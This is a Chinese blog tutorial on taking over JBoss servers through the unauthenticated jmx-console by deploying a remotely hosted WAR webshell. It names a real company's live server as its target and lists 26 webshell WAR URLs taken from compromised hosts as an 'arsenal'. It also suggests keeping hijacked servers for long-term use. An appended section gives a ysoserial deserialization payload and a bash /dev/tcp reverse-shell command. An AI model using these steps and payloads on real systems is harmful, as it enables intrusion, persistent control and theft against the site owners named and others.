利用JBoss漏洞拿webshell方法

本文详细介绍了如何通过搜索JBoss平台的特定特征、访问网站进行漏洞测试、添加Webshell的war文件地址、应用修改使设置生效、充实武器库以及最终获得Webshell的过程。通过实践操作,获取服务器权限并对其进行升级和加固。
部署运行你感兴趣的模型镜像

 JBoss是一个大型应用平台,普通用户很难接触到。越是难以接触到的东西越觉得高深,借用北京公交司机李素丽的一句话“用力只能干出称职,用心才能干出优秀”,在安全上也是如此,虽然JBoss平台很难掌握,但是只要找到Jboss的罩门,一样轻松渗透,本文就如何针对Jboss的一个漏洞来获取其Webshell,由于是研究,因此仅仅点到为止。

  一、信息收集与整理 1.使用漏洞特征进行搜索

  在Jboss的整个漏洞中一个显著的特征就是“8080/jmx-console/”,当然整个也还有其它特征,用这个特征主要便于在Google中进行搜索,现在使用google的搜索地址为:www.google.com.hk,使用百度搜索的效果不如Google。在Google的输入框中输入:inurl:”8080/jmx-console/” ,会出来一堆结果。

  2.访问网站并进行漏洞测试

  对搜索出来的记录一一进行查看,看看能否正常访问。由于搜索引擎的时效性,有些网站虽然结果在搜索结果中,但由于各种原因网站已经不能访问。如果网站不能正常访问就舍弃。从结果中我们找到http://oa.tsingtaobeer-sales.com:8080/jmx-console/网站能够正常访问,然后在该页面中搜索“jboss.deployment”,并找到* flavor=URL,type=DeploymentScanner,单击该链接看看能否正常访问,如图1所示。

  图1 测试Jboss页面

  3.添加Webshell的war文件地址

  将Jsp的shell压缩成war文件,然后将该war上传到互联网上能够访问的网站上,例如本例中的war的真实地址为“http://www.cam*****.com.hk/forum/forumdata/cache/war.war”。当前打开的页面地址为“http://oa.tsingtaobeer-sales.com:8080/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.deployment%3Atype%3DDeploymentScanner%2Cflavor%3DURL”,在该页面中去寻找“void addURL()”函数,找到后将“http://www.cam*****.com.hk/forum/forumdata/cache/cmd.war”复制“ParamValue”中,如图2所示,然后单击“invoke”将http://www.cam*****.com.hk/forum/forumdata/cache/war.war下载到本地服务器本进行部署。部署成功后会给出相应的提示,如图3所示。

  图2 利用addURL函数下载并部署war文件

  图3 操作执行成功

4.应用修改使设置生效

  再次回到主界面中,如图4所示,在URLList中会看到刚才加入的war地址,单击“Apply Change”使设置生效。

  图4应用修改使设置生效

  5.充实“武器库”

  通过观察URLList,发现该列表就是部署war的地址,如果通过前面的步骤在URLList中仅仅只有你自己的地址,那么恭喜你是第一个获取该服务器,在获取服务器的权限后可以对其进行升级和加固,升级和加固后,这个服务器以后就可能长期由你来“维护”和使用。在本例中将URLList中的值复制到记事本,然后进行整理,好家伙有26war文件。其war地址列表如下:

  http://116.232.230.228/xm.war

  http://117.67.0.248/wc.war

  http://121.207.250.24/war.zip

  http://121.207.250.24/war1.zip

  http://189.54.19.69:8181/cmd.war

  http://189.54.19.69:8181/h2010.war

  http://192.168.1.56:8080/System-Console/jsp/test.war

  http://203.246.56.27:8080/safe/safe.war

  http://210.51.25.183/icons/war.war

  http://221.137.124.253:8080/System-Console/jsp/job.jsp

  http://221.137.124.253:8080/System-Console/jsp/test.war

  http://61.178.73.149/job/no.war

  http://blog.avfree.cn/cmd.war

  http://blog.xiancn.com/Browser.war

  http://blog.xiancn.com/cmd.war

  http://jbosstest.webs.com/Browser.war

http://www.acclaimedenterprises.com/tmp/browser.war

  http://www.camgear.com.hk/forum/forumdata/cache/Browser.war

  http://www.cfblog.com/honeywell/war.war

  http://www.laodu.com.cn/ri/hack.war

  http://www.nmgfb.com/coody.war

  http://www.posumex.com/bdd/user/war.war

  http://www.str0m.cn/1.war

  http://www.yunxi.net/cmd.war

  http://yese.yi.org/cmd.war

  http://yese.yi.org/war/cmd.war

  依次访问这些地址,当然更有一个简单的办法复制这些地址将其粘贴在Flashget中,通过Flashget来下载。虽然这些地址中有些war无法下载,但通过对下载的war文件进行整理和分析,获取了4个好用的war文件,笔者在测试时就应用war文件问题,来回折腾了好几回都没有成功,换成获取的war文件就成功了,将这些好用的war归入武器库,充实弹药!

6.获得Webshell

  在浏览器中输入地址“http://oa.tsingtaobeer-sales.com:8080/war”测试Webshell能否正常访问,如图5所示,出来我们比较熟悉的JSP Webshell页面。需要特别注意的是,在部署过程中可能由于war文件和网站路径的不同,可能其访问地址会有一些偏差,因此需要多进行测试,有的直接可以访问有的需要加war包的名称。关于Jboss获取的详细细节感兴趣的朋友可以到www.antian365.com查看JBoss获取Webshell录像。

  图5 获得Webshell


您可能感兴趣的与本文相关的镜像

GPT-oss:20b

GPT-oss:20b

图文对话
Gpt-oss

GPT OSS 是OpenAI 推出的重量级开放模型,面向强推理、智能体任务以及多样化开发场景

在春秋靶场中,针对 JBoss 漏洞的环境搭建与练习,通常涉及中间件漏洞利用、反序列化攻击以及未授权访问等常见安全问题。以下是关于 JBoss 漏洞环境搭建与练习的相关指南。 ### 漏洞环境搭建 1. **安装 JBoss 服务器** 在搭建 JBoss 漏洞环境时,首先需要下载并安装低版本的 JBoss 应用服务器。推荐使用 JBoss 4.x 或 JBoss 5.x 系列,因为这些版本存在多个已知漏洞,如 JMX Console 未授权访问漏洞(CVE-2017-7504)等。可以通过以下命令解压并启动 JBoss: ```bash unzip jboss-4.2.3.GA.zip cd jboss-4.2.3.GA/bin ./run.sh ``` 启动后,访问 `http://127.0.0.1:8080/jmx-console` 可以进入 JMX Console 管理界面[^1]。 2. **配置漏洞靶场** 为了模拟真实攻击场景,可以使用 Vulhub 或者手动配置靶场。Vulhub 是一个开源的漏洞靶场,支持一键部署多个中间件漏洞环境。在 Kali Linux 上,可以通过更换 APT 源来加速下载: ```bash echo "deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib" > /etc/apt/sources.list apt update && apt install docker docker-compose git clone https://github.com/vulhub/vulhub.git cd vulhub/jboss/CVE-2017-7504 docker-compose up -d ``` 这样即可一键部署 JBoss 反序列化漏洞环境[^4]。 ### 漏洞利用练习 1. **JMX Console 未授权访问漏洞** JBoss 默认配置中未启用身份验证,攻击者可以直接访问 JMX Console 并执行任意 MBean 操作。通过该漏洞,攻击者可以上传恶意 WAR 文件,进而获取服务器控制权。可以使用 `curl` 或浏览器访问 `http://127.0.0.1:8080/jmx-console`,并尝试部署一个包含 WebShell 的 WAR 文件。 2. **反序列化漏洞(CVE-2017-7504)** JBoss 使用了 Apache Commons Collections 库,该库在某些版本中存在反序列化漏洞。可以使用 `ysoserial` 工具生成恶意序列化数据,触发远程代码执行。例如: ```bash java -jar ysoserial-all.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwLjE5MC82NjY2IDA+JjE=}|{base64,-d}|{bash,-i}" > exp.ser ``` 生成的 `exp.ser` 文件可用于向目标服务器发送恶意请求,从而实现反弹 Shell 控制[^3]。 3. **反弹 Shell 配置** 在利用漏洞时,通常需要配置反弹 Shell 以获取服务器权限。可以使用以下命令生成 Base64 编码的反弹 Shell: ```bash echo "bash -i >& /dev/tcp/192.168.10.190/6666 0>&1" | base64 ``` 生成的编码可用于构造恶意请求,确保攻击者能够通过指定 IP 和端口接收 Shell 控制[^2]。 ###
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值